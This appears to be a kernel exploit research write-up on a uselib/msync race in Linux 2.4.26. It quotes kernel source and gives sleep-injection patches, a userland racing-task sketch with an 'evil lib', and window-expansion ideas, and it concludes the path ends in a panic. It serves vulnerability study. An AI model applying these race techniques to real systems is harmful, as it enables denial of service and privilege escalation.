uselib/msync exploit in kernel 2.4.26

Race between uselib and msync

One of the interesting features of do_brk is that it can also unmap memory if called on a region that already possesses a mapping. The do_brk call in the uselib system call is not protected by the mmap_sem semaphore, so it can be used to prematurely unmap an arbitrary region of process memory. This comes in handy when combined with the msync system call.
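For context, here is the uselib path, abridged and lightly paraphrased from fs/binfmt_elf.c in 2.4: the do_mmap of the library contents runs under mmap_sem, but the trailing do_brk of the bss does not:

static int load_elf_library(struct file *file)
{
	...
	/* mapping the library contents is semaphore-protected */
	down_write(&current->mm->mmap_sem);
	error = do_mmap(file,
			ELF_PAGESTART(elf_phdata->p_vaddr),
			...);
	up_write(&current->mm->mmap_sem);
	...
	len = ELF_PAGESTART(elf_phdata->p_filesz + elf_phdata->p_vaddr +
			    ELF_MIN_ALIGN - 1);
	bss = elf_phdata->p_memsz + elf_phdata->p_vaddr;
	if (bss > len)
		do_brk(len, bss - len);	/* no mmap_sem held here */
	...
}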

The race window is in msync_interval:

static int msync_interval(struct vm_area_struct * vma,
	unsigned long start, unsigned long end, int flags)
{
	int ret = 0;
	struct file * file = vma->vm_file;

	if ( (flags & MS_INVALIDATE) && (vma->vm_flags & VM_LOCKED) )
		return -EBUSY;

	if (file && (vma->vm_flags & VM_SHARED)) {
		ret = filemap_sync(vma, start, end-start, flags);

		if (!ret && (flags & (MS_SYNC|MS_ASYNC))) {

			struct inode * inode = file->f_dentry->d_inode;

			down(&inode->i_sem);
			ret = filemap_fdatasync(inode->i_mapping);
			...

On the other side of the race, within the uselib path, do_brk (mm/mmap.c) clears any old mapping before installing its own; this is where do_munmap gets called:

munmap_back:
	vma = find_vma_prepare(mm, addr, &prev, &rb_link, &rb_parent);
	if (vma && vma->vm_start < addr + len) {
		if (do_munmap(mm, addr, len))
			return -ENOMEM;

Within do_munmap, fput() is called on the vma's file; when the last reference is dropped, fput() nulls out f_dentry.
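For reference, a sketch of 2.4's fput() (fs/file_table.c, abridged and paraphrased): once the last reference is dropped, the cached dentry pointer is cleared:

void fput(struct file *file)
{
	struct dentry *dentry = file->f_dentry;
	struct inode *inode = dentry->d_inode;

	if (atomic_dec_and_test(&file->f_count)) {
		if (file->f_op && file->f_op->release)
			file->f_op->release(inode, file);
		...
		file->f_dentry = NULL;	/* msync's file->f_dentry->d_inode now oopses */
		file->f_vfsmnt = NULL;
		...
	}
}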

Let's call the address of the library's contents contents_addr and the address of its bss bss_addr. Our evil lib has one page of contents and one page of bss. The interleaving is as follows:

  • t1: mmap 1 page at bss_addr that is backed by some file fd1
  • t1: uselib->mmap contents at contents_addr
  • t2: msync 1 page at bss_addr, SLEEP right before grabbing dentry pointer
  • t1: uselib->do_brk->do_munmap at bss_addr
  • t1: SLEEP sometime before vma_link
  • t2: msync comes out of sleep now and f_dentry has been nulled out
To produce this interleaving, two sleeps are required (see the patches below); a userland sketch of the two racing tasks follows the notes.

find_vma() (called from sys_msync) locates the first memory region whose vm_end field is greater than addr and returns the address of its descriptor. This lookup must happen before do_munmap's rb_erase() removes the vma from the tree, otherwise msync never reaches msync_interval.
Note: Parent and child share the same mm_struct, and both zap_page_range() (on the do_munmap side) and filemap_sync() (on the msync side) need to acquire the page_table_lock.
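Putting the interleaving together, here is a minimal userland sketch of the two racing tasks, run against the patched kernel below. The file names are hypothetical, and it assumes the evil library's program headers are crafted so its bss page lands at 0x60000000, the address the mmap.c sleep patch keys on:

#include <fcntl.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#define BSS_ADDR ((void *)0x60000000)
#define PAGE_SZ  4096

static void *t2_msync(void *arg)
{
	/* t2: enters msync_interval having grabbed file = vma->vm_file,
	 * then sleeps 2*HZ (filemap.c patch below) */
	msync(BSS_ADDR, PAGE_SZ, MS_ASYNC);
	return NULL;
}

int main(void)
{
	pthread_t t2;
	int fd1 = open("backing_file", O_RDWR | O_CREAT, 0666);	/* hypothetical name */

	ftruncate(fd1, PAGE_SZ);
	/* t1: shared file-backed mapping at bss_addr so msync takes
	 * the file && VM_SHARED branch of msync_interval */
	mmap(BSS_ADDR, PAGE_SZ, PROT_READ | PROT_WRITE,
	     MAP_SHARED | MAP_FIXED, fd1, 0);
	close(fd1);	/* the vma now holds the only reference to the file */

	pthread_create(&t2, NULL, t2_msync, NULL);
	usleep(100000);	/* let t2 reach its in-kernel sleep first */

	/* t1: uselib maps the contents, then do_brk->do_munmap tears down
	 * bss_addr and fput() nulls f_dentry while t2 is still asleep */
	syscall(SYS_uselib, "./evil_lib");	/* hypothetical path */

	pthread_join(t2, NULL);
	return 0;
}

pthreads are used here so that both tasks share one mm_struct, matching the note above.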

Patches adding the two sleeps, for mm/mmap.c and mm/filemap.c respectively:
--- /usr/src/kernel-source-2.4.26/mm/mmap.c	2004-02-18 08:36:32.000000000 -0500
+++ mmap.c	2015-11-28 08:57:50.232849728 -0500
@@ -19,6 +19,10 @@
 #include <asm/uaccess.h>
 #include <asm/pgalloc.h>
 
+/* sleep patch */
+#include <asm-i386/param.h>
+#include <linux/sched.h>
+
 /*
  * WARNING: the debugging will use recursive algorithms so never enable this
  * unless you know what you are doing.
@@ -965,6 +969,10 @@
 
 	npp = (prev ? &prev->vm_next : &mm->mmap);
 	free = NULL;
+	if (addr == 0x60000000 && len == 4096) {
+		set_current_state(TASK_UNINTERRUPTIBLE);
+		schedule_timeout(1 * HZ);
+	}
 	spin_lock(&mm->page_table_lock);
 	for ( ; mpnt && mpnt->vm_start < addr+len; mpnt = *npp) {
 		*npp = mpnt->vm_next;
--- /usr/src/kernel-source-2.4.26/mm/filemap.c	2004-08-24 12:46:28.000000000 -0400
+++ filemap.c	2015-11-28 08:57:57.566734808 -0500
@@ -30,6 +30,10 @@
 
 #include <linux/highmem.h>
 
+/* sleep patch */
+#include <asm-i386/param.h>
+#include <linux/sched.h>
+
 /*
  * Shared mappings implemented 30.11.1994. It's not fully working yet,
  * though.
@@ -2353,6 +2357,8 @@
 		return -EBUSY;
 
 	if (file && (vma->vm_flags & VM_SHARED)) {
+		set_current_state(TASK_UNINTERRUPTIBLE);
+		schedule_timeout(2 * HZ);
 		ret = filemap_sync(vma, start, end-start, flags);
 
 		if (!ret && (flags & (MS_SYNC|MS_ASYNC))) {

The Linux kernel uses a data structure called struct page to keep track of each physical page frame. These struct page objects form an array named mem_map[].

/boot $ grep 'mem_map' System.map-2.4.26

After writepage() in filemap_fdatasync, there is a VALID_PAGE check in page_cache_release():

if (!VALID_PAGE(page))
	BUG();
VALID_PAGE is a macro, defined on i386 as:

((page - mem_map) < max_mapnr)

It is impossible for our fake page to pass this check, so the kernel will panic.
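To make the arithmetic concrete, here is the check with hypothetical numbers; mem_map's address and max_mapnr below are illustrative, not taken from a real System.map:

/* Assumed values for a 128 MB i386 box (illustrative only) */
struct page *mem_map = (struct page *)0xc1000030;	/* assumed */
unsigned long max_mapnr = 32768;			/* 128 MB / 4 KB pages */

struct page *fake = (struct page *)0x08400000;	/* attacker-controlled pointer */

/* VALID_PAGE computes (fake - mem_map): a pointer difference far outside
 * [0, max_mapnr). Promoted to unsigned long, it is never < 32768, so
 * page_cache_release() hits BUG() and the kernel oopses. */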

Possible window expansion

do_munmap has to call kmem_cache_alloc(), so we can take advantage of the same strategy used in the uselib/mmap exploit.
The default allocator in this kernel version is the SLAB allocator, which keeps caches of pre-allocated objects for vma structures. When all slabs containing pre-allocated vmas are full, the kernel needs to allocate a new page and create a new slab. Usually this returns quickly; however, if no memory is currently available, the kernel will try to free pages and reclaim memory from its caches.
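A sketch of how one might create that pressure from userland before triggering the race; the helper name and sizes are assumptions, not taken from the original exploit:

#include <string.h>
#include <sys/mman.h>

/* Hypothetical helper: dirty anonymous pages until allocation fails, so
 * do_munmap's kmem_cache_alloc(vm_area_cachep, ...) has to reclaim */
static void apply_memory_pressure(void)
{
	for (;;) {
		char *p = mmap(NULL, 1 << 20, PROT_READ | PROT_WRITE,
			       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
		if (p == MAP_FAILED)
			break;
		memset(p, 1, 1 << 20);	/* fault every page in */
	}
}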
On the other hand, filemap_sync scans the page-table entries corresponding to the linear address interval of the memory region; for each page found, it invokes flush_tlb_page() to flush the corresponding TLB entry and marks the page as dirty. So this window can be enlarged as well. This can be verified with the RDTSC instruction.
Note: Most Intel CPUs execute code out of order, so there is no guarantee that the compiled instructions run in the order they appear in the C source. When we use RDTSC, we pretend the timestamp is read exactly at the beginning and at the end of the code being measured; to make that true, CPUID must be issued just before each RDTSC to serialize execution. However, the cycle cost of CPUID itself has a lot of intrinsic variance, so we lose measurement resolution by using it.
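A conventional CPUID+RDTSC timing harness for such a measurement (a sketch; serialized_rdtsc and the measured region are placeholders, not from the original write-up):

#include <stdio.h>

/* CPUID serializes the pipeline so RDTSC cannot be reordered
 * around the code being measured */
static inline unsigned long long serialized_rdtsc(void)
{
	unsigned int lo, hi;
	asm volatile("cpuid\n\t"
		     "rdtsc"
		     : "=a"(lo), "=d"(hi)
		     : "a"(0)
		     : "ebx", "ecx");
	return ((unsigned long long)hi << 32) | lo;
}

int main(void)
{
	unsigned long long t0 = serialized_rdtsc();
	/* ... code under measurement, e.g. the msync() call ... */
	unsigned long long t1 = serialized_rdtsc();
	printf("%llu cycles\n", t1 - t0);
	return 0;
}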

Nevertheless, even if we succeed in sleeping in kmem_cache_alloc and extending the time spent in filemap_sync, do_munmap is still unable to null out f_dentry: by the time it wakes up from kmem_cache_alloc, the page_table_lock is held by filemap_sync.

Implementation

